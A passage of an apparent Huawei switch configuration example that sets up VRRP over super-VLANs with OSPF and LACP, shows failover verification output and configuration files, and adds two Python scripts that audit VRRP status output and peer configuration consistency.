[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] undo port trunk allow-pass vlan 1
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 400
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] undo port trunk allow-pass vlan 1
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 101 to 180
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface vlanif 11
[SwitchA-Vlanif11] ip address 10.1.1.2 24
[SwitchA-Vlanif11] quit
[SwitchA] interface vlanif 12
[SwitchA-Vlanif12] ip address 10.1.2.2 24
[SwitchA-Vlanif12] quit
[SwitchA] interface vlanif 13
[SwitchA-Vlanif13] ip address 10.1.3.2 24
[SwitchA-Vlanif13] quit
[SwitchA] interface vlanif 14
[SwitchA-Vlanif14] ip address 10.1.4.2 24
[SwitchA-Vlanif14] quit
[SwitchA] interface vlanif 15
[SwitchA-Vlanif15] ip address 10.1.5.2 24
[SwitchA-Vlanif15] quit
[SwitchA] interface vlanif 400
[SwitchA-Vlanif400] ip address 192.168.1.1 24
[SwitchA-Vlanif400] quit

# Configure Layer 2 transparent transmission on the switch.


<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 11 to 15 101 to 180
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk
[Switch-GigabitEthernet1/0/1] undo port trunk allow-pass vlan 1
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 11 to 15 101 to 180
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type trunk
[Switch-GigabitEthernet1/0/2] undo port trunk allow-pass vlan 1
[Switch-GigabitEthernet1/0/2] port trunk allow-pass vlan 11 to 15 101 to 180
[Switch-GigabitEthernet1/0/2] quit

# Configure OSPF on SwitchA, SwitchB, and SwitchC. SwitchA is used as an example. The configurations of SwitchB and SwitchC are similar to the configuration of SwitchA, and are not mentioned here. For details, see the configuration files. The aggregation switch forwards at Layer 2 only and runs no OSPF.
[SwitchA] ospf 1
[SwitchA-ospf-1] area 0
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.2.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.3.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.4.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.5.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 192.168.1.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] quit
[SwitchA-ospf-1] quit

Step 2 Configure super-VLANs on SwitchA and SwitchB.

# Configure the super-VLANs on SwitchA. The configuration of SwitchB is similar to the configuration of SwitchA, and is not mentioned here. For details, see the configuration files.
[SwitchA] vlan 11
[SwitchA-vlan11] aggregate-vlan
[SwitchA-vlan11] access-vlan 101 to 116 301
[SwitchA-vlan11] quit
[SwitchA] vlan 12
[SwitchA-vlan12] aggregate-vlan
[SwitchA-vlan12] access-vlan 117 to 132 302
[SwitchA-vlan12] quit
[SwitchA] vlan 13
[SwitchA-vlan13] aggregate-vlan
[SwitchA-vlan13] access-vlan 133 to 148 303
[SwitchA-vlan13] quit
[SwitchA] vlan 14
[SwitchA-vlan14] aggregate-vlan
[SwitchA-vlan14] access-vlan 149 to 164 304
[SwitchA-vlan14] quit
[SwitchA] vlan 15
[SwitchA-vlan15] aggregate-vlan
[SwitchA-vlan15] access-vlan 165 to 180 305
[SwitchA-vlan15] quit

Step 3 Configure link aggregation on SwitchA and SwitchB.

# Create Eth-Trunk 1 in LACP mode on SwitchA. The configuration of SwitchB is similar to the configuration of SwitchA, and is not mentioned here. For details, see the configuration files.
[SwitchA] interface eth-trunk 1
[SwitchA-Eth-Trunk1] mode lacp
[SwitchA-Eth-Trunk1] port link-type trunk
[SwitchA-Eth-Trunk1] undo port trunk allow-pass vlan 1
[SwitchA-Eth-Trunk1] port trunk allow-pass vlan 301 to 305
[SwitchA-Eth-Trunk1] quit

# Add member interfaces on SwitchA to Eth-Trunk 1. The configuration of SwitchB is similar to the configuration of SwitchA, and is not mentioned here. For details, see the configuration files.
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] eth-trunk 1
[SwitchA-GigabitEthernet1/0/3] quit
[SwitchA] interface gigabitethernet 1/0/4
[SwitchA-GigabitEthernet1/0/4] eth-trunk 1
[SwitchA-GigabitEthernet1/0/4] quit

Step 4 Configure VRRP groups on SwitchA and SwitchB.

# Configure a VRRP group on SwitchA, and set the priority of SwitchA to 120 and the
preemption delay to 20s.
[SwitchA] interface vlanif 11
[SwitchA-Vlanif11] vrrp vrid 1 virtual-ip 10.1.1.1
[SwitchA-Vlanif11] vrrp vrid 1 priority 120 //The default priority of a device in a VRRP group is 100. Set the priority of the master higher than that of the backup.
[SwitchA-Vlanif11] vrrp vrid 1 preempt-mode timer delay 20 //A device in a VRRP group preempts immediately by default. A preemption delay on the master prevents traffic interruptions caused by frequent master/backup switchovers on an unstable network.
[SwitchA-Vlanif11] vrrp vrid 1 track interface gigabitethernet 1/0/1 reduced 100 //Associate the VRRP group with the uplink interface. The reduction must leave the master below the backup (120 - 100 = 20, lower than 100) so that an active/standby switchover is triggered.
[SwitchA-Vlanif11] vrrp vrid 1 track interface gigabitethernet 1/0/2 reduced 100 //Associate the VRRP group with the downlink interface in the same way.
[SwitchA-Vlanif11] vrrp advertise send-mode 301 //Send VRRP advertisements only in sub-VLAN 301 instead of in every sub-VLAN of the super-VLAN, to save network bandwidth.
[SwitchA-Vlanif11] quit
[SwitchA] interface vlanif 12
[SwitchA-Vlanif12] vrrp vrid 2 virtual-ip 10.1.2.1
[SwitchA-Vlanif12] vrrp vrid 2 priority 120
[SwitchA-Vlanif12] vrrp vrid 2 preempt-mode timer delay 20
[SwitchA-Vlanif12] vrrp vrid 2 track interface gigabitethernet 1/0/1 reduced 100
[SwitchA-Vlanif12] vrrp vrid 2 track interface gigabitethernet 1/0/2 reduced 100
[SwitchA-Vlanif12] vrrp advertise send-mode 302
[SwitchA-Vlanif12] quit
[SwitchA] interface vlanif 13
[SwitchA-Vlanif13] vrrp vrid 3 virtual-ip 10.1.3.1
[SwitchA-Vlanif13] vrrp vrid 3 priority 120
[SwitchA-Vlanif13] vrrp vrid 3 preempt-mode timer delay 20
[SwitchA-Vlanif13] vrrp vrid 3 track interface gigabitethernet 1/0/1 reduced 100
[SwitchA-Vlanif13] vrrp vrid 3 track interface gigabitethernet 1/0/2 reduced 100
[SwitchA-Vlanif13] vrrp advertise send-mode 303
[SwitchA-Vlanif13] quit
[SwitchA] interface vlanif 14
[SwitchA-Vlanif14] vrrp vrid 4 virtual-ip 10.1.4.1
[SwitchA-Vlanif14] vrrp vrid 4 priority 120
[SwitchA-Vlanif14] vrrp vrid 4 preempt-mode timer delay 20
[SwitchA-Vlanif14] vrrp vrid 4 track interface gigabitethernet 1/0/1 reduced 100
[SwitchA-Vlanif14] vrrp vrid 4 track interface gigabitethernet 1/0/2 reduced 100
[SwitchA-Vlanif14] vrrp advertise send-mode 304
[SwitchA-Vlanif14] quit
[SwitchA] interface vlanif 15
[SwitchA-Vlanif15] vrrp vrid 5 virtual-ip 10.1.5.1
[SwitchA-Vlanif15] vrrp vrid 5 priority 120
[SwitchA-Vlanif15] vrrp vrid 5 preempt-mode timer delay 20
[SwitchA-Vlanif15] vrrp vrid 5 track interface gigabitethernet 1/0/1 reduced 100
[SwitchA-Vlanif15] vrrp vrid 5 track interface gigabitethernet 1/0/2 reduced 100
[SwitchA-Vlanif15] vrrp advertise send-mode 305
[SwitchA-Vlanif15] quit

# Configure a VRRP group on SwitchB. SwitchB uses the default priority of 100.
[SwitchB] interface vlanif 11
[SwitchB-Vlanif11] vrrp vrid 1 virtual-ip 10.1.1.1
[SwitchB-Vlanif11] vrrp advertise send-mode 301
[SwitchB-Vlanif11] quit
[SwitchB] interface vlanif 12
[SwitchB-Vlanif12] vrrp vrid 2 virtual-ip 10.1.2.1
[SwitchB-Vlanif12] vrrp advertise send-mode 302
[SwitchB-Vlanif12] quit
[SwitchB] interface vlanif 13
[SwitchB-Vlanif13] vrrp vrid 3 virtual-ip 10.1.3.1
[SwitchB-Vlanif13] vrrp advertise send-mode 303
[SwitchB-Vlanif13] quit
[SwitchB] interface vlanif 14
[SwitchB-Vlanif14] vrrp vrid 4 virtual-ip 10.1.4.1
[SwitchB-Vlanif14] vrrp advertise send-mode 304
[SwitchB-Vlanif14] quit
[SwitchB] interface vlanif 15
[SwitchB-Vlanif15] vrrp vrid 5 virtual-ip 10.1.5.1
[SwitchB-Vlanif15] vrrp advertise send-mode 305
[SwitchB-Vlanif15] quit

Step 5 Disable STP on SwitchA, SwitchB, SwitchC, and the switch.

# The links between these switches form physical rings. The VLANs on the ring links do not overlap, so there is no Layer 2 loop, but STP would still block one of the Layer 3 interfaces; disable STP globally on all four devices. SwitchA is used as an example. The configurations of SwitchB, SwitchC, and the switch are similar to the configuration of SwitchA, and are not mentioned here. For details, see the configuration files.
[SwitchA] stp disable

Step 6 Verify the configuration.


# After the configuration is complete, run the display vrrp command on SwitchA. You can
see that SwitchA is the master in VRRP group 1. VRRP group 1 is used as an example.
Information of other VRRP groups is similar to information of VRRP group 1.
[SwitchA] display vrrp 1
Vlanif11 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.1
Master IP : 10.1.1.2
Send VRRP packet to subvlan : 301
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Track IF : GigabitEthernet1/0/1 Priority reduced : 100
IF state : UP
Track IF : GigabitEthernet1/0/2 Priority reduced : 100
IF state : UP
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 11:38:58

# Run the display vrrp command on SwitchB. You can see that SwitchB is the backup.
VRRP group 1 is used as an example.
[SwitchB] display vrrp 1
Vlanif11 | Virtual Router 1
State : Backup
Virtual IP : 10.1.1.1
Master IP : 10.1.1.2
Send VRRP packet to subvlan : 301
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 11:38:58

# Run the shutdown command on GE1/0/1 of SwitchA to simulate a link fault. Then run the display vrrp command on SwitchA and SwitchB. The running priority of SwitchA has dropped from 120 to 20, SwitchA is in Backup state, SwitchB has entered the Master state, and the tracked interface GE1/0/1 shows IF state DOWN.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] shutdown
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] display vrrp 1
Vlanif11 | Virtual Router 1
State : Backup
Virtual IP : 10.1.1.1
Master IP : 10.1.1.3
Send VRRP packet to subvlan : 301
PriorityRun : 20
PriorityConfig : 120
MasterPriority : 100
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Track IF : GigabitEthernet1/0/1 Priority reduced : 100
IF state : DOWN
Track IF : GigabitEthernet1/0/2 Priority reduced : 100
IF state : UP
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:12:38
[SwitchB] display vrrp 1
Vlanif11 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.1
Master IP : 10.1.1.3
Send VRRP packet to subvlan : 301
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 100
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:12:38

# Run the undo shutdown command on GE1/0/1 of SwitchA.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] undo shutdown
[SwitchA-GigabitEthernet1/0/1] quit

# After 20s, run the display vrrp command on SwitchA and SwitchB. SwitchA has become the master again and SwitchB the backup, and the tracked interface is Up again. SwitchA waits for its 20s preemption delay before reclaiming the master role.
[SwitchA] display vrrp 1
Vlanif11 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.1
Master IP : 10.1.1.2
Send VRRP packet to subvlan : 301
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Track IF : GigabitEthernet1/0/1 Priority reduced : 100
IF state : UP
Track IF : GigabitEthernet1/0/2 Priority reduced : 100
IF state : UP
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:17:36
[SwitchB] display vrrp 1
Vlanif11 | Virtual Router 1
State : Backup
Virtual IP : 10.1.1.1
Master IP : 10.1.1.2
Send VRRP packet to subvlan : 301
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:17:36

----End
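Reading the display vrrp output by eye, as the verification step above does, is fine once; a practitioner who runs this check after every change wants it automated. The following Python script is an added example and not a Huawei tool. It parses the display vrrp output format shown above (the "Key : Value" lines, the combined Preempt/Delay Time line, and the Track IF or Track BFD line followed by its state line) and reports the conditions worth flagging: unauthenticated advertisements (Auth type NONE), a disabled TTL check, a tracked interface or BFD session that is Down, and a running priority that no longer matches the configured one. The embedded sample is the SwitchA output after the shutdown above, copied as constructed input; the finding texts and function names are this script's own.

```python
"""Parse `display vrrp` output and flag what a reviewer would want to see.
Added example for this page; not a Huawei tool."""
import re

# Constructed sample input: the SwitchA output shown above after GE1/0/1 was shut down.
SAMPLE_OUTPUT = """\
Vlanif11 | Virtual Router 1
State : Backup
Virtual IP : 10.1.1.1
Master IP : 10.1.1.3
Send VRRP packet to subvlan : 301
PriorityRun : 20
PriorityConfig : 120
MasterPriority : 100
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Track IF : GigabitEthernet1/0/1 Priority reduced : 100
IF state : DOWN
Track IF : GigabitEthernet1/0/2 Priority reduced : 100
IF state : UP
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:12:38
"""

HEADER = re.compile(r"^(\S+) \| Virtual Router (\d+)$")
TRACK = re.compile(r"^Track (IF|BFD) : (\S+) Priority (reduced|increased) : (\d+)$")
TRACK_STATE = re.compile(r"^(?:IF|BFD-session) state : (\S+)$")
PREEMPT = re.compile(r"^Preempt : (\S+) Delay Time : (\d+) s$")
KEY_VALUE = re.compile(r"^([A-Za-z][A-Za-z -]*?) : (.*)$")
INT_FIELDS = {"PriorityRun", "PriorityConfig", "MasterPriority"}


def parse_display_vrrp(text):
    """Return one dict per virtual router. Tracked objects are collected under 'tracks'
    as (kind, name, direction, delta, state) tuples."""
    groups, current, pending = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := HEADER.match(line):
            current = {"interface": m.group(1), "vrid": int(m.group(2)), "tracks": []}
            groups.append(current)
        elif current is None:
            continue  # text before the first virtual router header
        elif m := TRACK.match(line):
            pending = [m.group(1), m.group(2), m.group(3), int(m.group(4))]
        elif (m := TRACK_STATE.match(line)) and pending:
            current["tracks"].append(tuple(pending + [m.group(1)]))
            pending = None
        elif m := PREEMPT.match(line):
            current["Preempt"] = m.group(1)
            current["Delay Time"] = int(m.group(2))
        elif m := KEY_VALUE.match(line):
            key, value = m.group(1), m.group(2).strip()
            current[key] = int(value) if key in INT_FIELDS else value
    return groups


def audit(group):
    """Findings for one virtual router, as plain strings."""
    tag = f"{group['interface']} vrid {group['vrid']}"
    findings = []
    if group.get("Auth type", "NONE").upper() == "NONE":
        findings.append(f"{tag}: VRRP advertisements are unauthenticated (Auth type NONE)")
    if group.get("Check TTL", "YES").upper() != "YES":
        findings.append(f"{tag}: TTL check disabled, advertisements from off-link senders are accepted")
    down = [t for t in group["tracks"] if t[4].upper() != "UP"]
    for kind, name, direction, delta, state in down:
        findings.append(f"{tag}: tracked {kind} {name} is {state} (priority {direction} by {delta})")
    run, cfg = group.get("PriorityRun"), group.get("PriorityConfig")
    if run is not None and cfg is not None:
        if run != cfg and not down:
            findings.append(f"{tag}: PriorityRun {run} differs from PriorityConfig {cfg} with no tracked object Down")
        if group.get("State") == "Backup" and run < cfg:
            findings.append(f"{tag}: demoted to Backup by tracking (running {run}, configured {cfg})")
    return findings


def audit_output(text):
    """Map 'interface vrid N' -> findings for every virtual router in the output."""
    return {f"{g['interface']} vrid {g['vrid']}": audit(g) for g in parse_display_vrrp(text)}


if __name__ == "__main__":
    for tag, findings in audit_output(SAMPLE_OUTPUT).items():
        print(tag)
        for finding in findings:
            print("  -", finding)
```

Feed it the output of display vrrp (all groups at once) from each peer; on the healthy master the only finding should be the missing authentication, and a "demoted to Backup" entry names the tracked object that caused the switchover.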

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 11 to 15 101 to 180 301 to 305 400
#
stp disable
#
vlan 11
aggregate-vlan
access-vlan 101 to 116 301
vlan 12
aggregate-vlan
access-vlan 117 to 132 302
vlan 13
aggregate-vlan
access-vlan 133 to 148 303
vlan 14
aggregate-vlan
access-vlan 149 to 164 304
vlan 15
aggregate-vlan
access-vlan 165 to 180 305
#
interface Vlanif11
ip address 10.1.1.2 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.1.1
vrrp vrid 1 priority 120
vrrp vrid 1 preempt-mode timer delay 20
vrrp vrid 1 track interface gigabitethernet1/0/1 reduced 100
vrrp vrid 1 track interface gigabitethernet1/0/2 reduced 100
vrrp advertise send-mode 301
#
interface Vlanif12
ip address 10.1.2.2 255.255.255.0
vrrp vrid 2 virtual-ip 10.1.2.1
vrrp vrid 2 priority 120
vrrp vrid 2 preempt-mode timer delay 20
vrrp vrid 2 track interface gigabitethernet1/0/1 reduced 100
vrrp vrid 2 track interface gigabitethernet1/0/2 reduced 100
vrrp advertise send-mode 302
#
interface Vlanif13
ip address 10.1.3.2 255.255.255.0
vrrp vrid 3 virtual-ip 10.1.3.1
vrrp vrid 3 priority 120
vrrp vrid 3 preempt-mode timer delay 20
vrrp vrid 3 track interface gigabitethernet1/0/1 reduced 100
vrrp vrid 3 track interface gigabitethernet1/0/2 reduced 100
vrrp advertise send-mode 303
#
interface Vlanif14
ip address 10.1.4.2 255.255.255.0
vrrp vrid 4 virtual-ip 10.1.4.1
vrrp vrid 4 priority 120
vrrp vrid 4 preempt-mode timer delay 20
vrrp vrid 4 track interface gigabitethernet1/0/1 reduced 100
vrrp vrid 4 track interface gigabitethernet1/0/2 reduced 100
vrrp advertise send-mode 304
#
interface Vlanif15
ip address 10.1.5.2 255.255.255.0
vrrp vrid 5 virtual-ip 10.1.5.1
vrrp vrid 5 priority 120
vrrp vrid 5 preempt-mode timer delay 20
vrrp vrid 5 track interface gigabitethernet1/0/1 reduced 100
vrrp vrid 5 track interface gigabitethernet1/0/2 reduced 100
vrrp advertise send-mode 305
#
interface Vlanif400
ip address 192.168.1.1 255.255.255.0
#
interface Eth-Trunk1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 301 to 305
mode lacp
#
interface GigabitEthernet1/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 400
#
interface GigabitEthernet1/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 101 to 180
#
interface GigabitEthernet1/0/3
eth-trunk 1
#
interface GigabitEthernet1/0/4
eth-trunk 1
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.1.2.0 0.0.0.255
network 10.1.3.0 0.0.0.255
network 10.1.4.0 0.0.0.255
network 10.1.5.0 0.0.0.255
network 192.168.1.0 0.0.0.255
#
return
l Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 11 to 15 101 to 180 200 301 to 305
#
stp disable
#
vlan 11
aggregate-vlan
access-vlan 101 to 116 301
vlan 12
aggregate-vlan
access-vlan 117 to 132 302
vlan 13
aggregate-vlan
access-vlan 133 to 148 303
vlan 14
aggregate-vlan
access-vlan 149 to 164 304
vlan 15
aggregate-vlan
access-vlan 165 to 180 305
#
interface Vlanif11
ip address 10.1.1.3 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.1.1
vrrp advertise send-mode 301
#
interface Vlanif12
ip address 10.1.2.3 255.255.255.0
vrrp vrid 2 virtual-ip 10.1.2.1
vrrp advertise send-mode 302
#
interface Vlanif13
ip address 10.1.3.3 255.255.255.0
vrrp vrid 3 virtual-ip 10.1.3.1
vrrp advertise send-mode 303
#
interface Vlanif14
ip address 10.1.4.3 255.255.255.0
vrrp vrid 4 virtual-ip 10.1.4.1
vrrp advertise send-mode 304
#
interface Vlanif15
ip address 10.1.5.3 255.255.255.0
vrrp vrid 5 virtual-ip 10.1.5.1
vrrp advertise send-mode 305
#
interface Vlanif200
ip address 192.168.2.1 255.255.255.0
#
interface Eth-Trunk1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 301 to 305
mode lacp
#
interface GigabitEthernet1/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 200
#
interface GigabitEthernet1/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 101 to 180
#
interface GigabitEthernet1/0/3
eth-trunk 1
#
interface GigabitEthernet1/0/4
eth-trunk 1
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.1.2.0 0.0.0.255
network 10.1.3.0 0.0.0.255
network 10.1.4.0 0.0.0.255
network 10.1.5.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return
l Configuration file of SwitchC
#
sysname SwitchC
#
vlan batch 200 300 400
#
stp disable
#
interface Vlanif200
ip address 192.168.2.2 255.255.255.0
#
interface Vlanif300
ip address 172.16.1.1 255.255.255.0
#
interface Vlanif400
ip address 192.168.1.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 400
#
interface GigabitEthernet1/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 200
#
interface GigabitEthernet1/0/3
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 300
#
ospf 1
area 0.0.0.0
network 172.16.1.0 0.0.0.255
network 192.168.1.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return

l Configuration file of the switch


#
sysname Switch
#
vlan batch 11 to 15 101 to 180
#
stp disable
#
interface GigabitEthernet1/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 11 to 15 101 to 180
#
interface GigabitEthernet1/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 11 to 15 101 to 180
#
return
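In this design the failure mode to watch for is not a dead link but a mismatch between the two peers' files: a VRID or virtual IP that differs between SwitchA and SwitchB, a super-VLAN whose sub-VLANs differ between the peers, or a vrrp advertise send-mode sub-VLAN that the Eth-Trunk does not carry, so the advertisements never reach the other switch and both peers end up in Master state. The following Python script is an added example, not Huawei tooling. It parses the configuration-file format shown above (sysname, vlan with aggregate-vlan and access-vlan, interface Vlanif, interface Eth-Trunk) for two peers and reports those inconsistencies. The embedded SwitchA configuration is a trimmed copy of the file above limited to VLAN 11; SwitchB is derived from it with the default priority and one deliberately introduced mistake, an Eth-Trunk that allows only VLANs 302 to 305. The function names and finding texts are this script's own.

```python
"""Peer-consistency audit for VRRP over super-VLANs, read from VRP configuration files.
Added example for this page; not a Huawei tool."""
import ipaddress
import re

# Constructed sample: the SwitchA file above trimmed to VLAN 11. SwitchB is derived from it with
# the default priority and one deliberate mistake: its Eth-Trunk does not carry sub-VLAN 301.
SWITCH_A = """\
sysname SwitchA
#
vlan 11
 aggregate-vlan
 access-vlan 101 to 116 301
#
interface Vlanif11
 ip address 10.1.1.2 255.255.255.0
 vrrp vrid 1 virtual-ip 10.1.1.1
 vrrp vrid 1 priority 120
 vrrp advertise send-mode 301
#
interface Eth-Trunk1
 port trunk allow-pass vlan 301 to 305
#
"""
SWITCH_B = (SWITCH_A.replace("SwitchA", "SwitchB").replace("10.1.1.2 255", "10.1.1.3 255")
            .replace(" vrrp vrid 1 priority 120\n", "").replace("301 to 305", "302 to 305"))


def expand_vlans(spec):
    """'101 to 116 301' -> {101, ..., 116, 301}, the range syntax VRP uses."""
    tokens, vlans, i = spec.split(), set(), 0
    while i < len(tokens):
        if i + 2 < len(tokens) and tokens[i + 1] == "to":
            vlans.update(range(int(tokens[i]), int(tokens[i + 2]) + 1))
            i += 3
        else:
            vlans.add(int(tokens[i]))
            i += 1
    return vlans


def _vlanif_line(vif, line):
    groups = vif["groups"]
    if m := re.match(r"ip address (\S+) (\S+)$", line):
        vif["ip"] = ipaddress.ip_interface(f"{m.group(1)}/{m.group(2)}")
    elif m := re.match(r"vrrp vrid (\d+) virtual-ip (\S+)$", line):
        groups.setdefault(int(m.group(1)), {"vip": None, "priority": 100})["vip"] = ipaddress.ip_address(m.group(2))
    elif m := re.match(r"vrrp vrid (\d+) priority (\d+)$", line):
        groups.setdefault(int(m.group(1)), {"vip": None, "priority": 100})["priority"] = int(m.group(2))
    elif m := re.match(r"vrrp advertise send-mode (\d+)$", line):
        vif["send_vlan"] = int(m.group(1))


def parse_config(text):
    """Collect sysname, super-VLAN membership, VRRP settings per Vlanif and the VLANs the
    Eth-Trunk carries. A '#' line or a new interface line ends the current block."""
    cfg = {"sysname": None, "vlanif": {}, "supervlan": {}, "trunk_vlans": set()}
    ctx = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "#" or line.startswith("interface "):
            ctx = None
        if m := re.match(r"sysname (\S+)$", line):
            cfg["sysname"] = m.group(1)
        elif m := re.match(r"interface Vlanif(\d+)$", line, re.I):
            ctx = ("vlanif", int(m.group(1)))
            cfg["vlanif"][ctx[1]] = {"ip": None, "groups": {}, "send_vlan": None}
        elif m := re.match(r"vlan (\d+)$", line):
            ctx = ("vlan", int(m.group(1)))
        elif re.match(r"interface Eth-Trunk\d+$", line, re.I):
            ctx = ("trunk",)
        elif ctx and ctx[0] == "vlanif":
            _vlanif_line(cfg["vlanif"][ctx[1]], line)
        elif ctx and ctx[0] == "vlan" and line == "aggregate-vlan":
            cfg["supervlan"].setdefault(ctx[1], set())
        elif ctx and ctx[0] == "vlan" and line.startswith("access-vlan "):
            cfg["supervlan"].setdefault(ctx[1], set()).update(expand_vlans(line[len("access-vlan "):]))
        elif ctx and ctx[0] == "trunk" and line.startswith("port trunk allow-pass vlan "):
            cfg["trunk_vlans"].update(expand_vlans(line[len("port trunk allow-pass vlan "):]))
    return cfg


def check_peers(a, b):
    """Findings for a VRRP pair; an empty list means the two files agree."""
    findings = []
    for vid in sorted(set(a["vlanif"]) | set(b["vlanif"])):
        va, vb = a["vlanif"].get(vid), b["vlanif"].get(vid)
        if va is None or vb is None:
            if (va or vb)["groups"]:
                findings.append(f"Vlanif{vid}: VRRP configured on one peer only")
            continue
        if va["groups"].keys() != vb["groups"].keys():
            findings.append(f"Vlanif{vid}: VRID sets differ ({sorted(va['groups'])} vs {sorted(vb['groups'])})")
        for vrid in va["groups"].keys() & vb["groups"].keys():
            ga, gb = va["groups"][vrid], vb["groups"][vrid]
            if ga["vip"] != gb["vip"]:
                findings.append(f"Vlanif{vid} vrid {vrid}: virtual IP differs ({ga['vip']} vs {gb['vip']})")
            if ga["priority"] == gb["priority"]:
                findings.append(f"Vlanif{vid} vrid {vrid}: equal priorities, master decided by IP address only")
            for cfg, vif, g in ((a, va, ga), (b, vb, gb)):
                if vif["ip"] and g["vip"] and g["vip"] not in vif["ip"].network:
                    findings.append(f"{cfg['sysname']} Vlanif{vid} vrid {vrid}: virtual IP {g['vip']} outside {vif['ip'].network}")
        if va["send_vlan"] != vb["send_vlan"]:
            findings.append(f"Vlanif{vid}: 'vrrp advertise send-mode' differs ({va['send_vlan']} vs {vb['send_vlan']})")
        for cfg, vif in ((a, va), (b, vb)):
            sv = vif["send_vlan"]
            if sv is not None and vid in cfg["supervlan"] and sv not in cfg["supervlan"][vid]:
                findings.append(f"{cfg['sysname']}: VLAN {sv} is not a sub-VLAN of super-VLAN {vid}")
            if sv is not None and sv not in cfg["trunk_vlans"]:
                findings.append(f"{cfg['sysname']}: VLAN {sv} not allowed on the Eth-Trunk, advertisements cannot reach the peer (both peers may become Master)")
    for vid in sorted(set(a["supervlan"]) | set(b["supervlan"])):
        if a["supervlan"].get(vid) != b["supervlan"].get(vid):
            findings.append(f"super-VLAN {vid}: access-vlan sets differ between the peers")
    return findings
```

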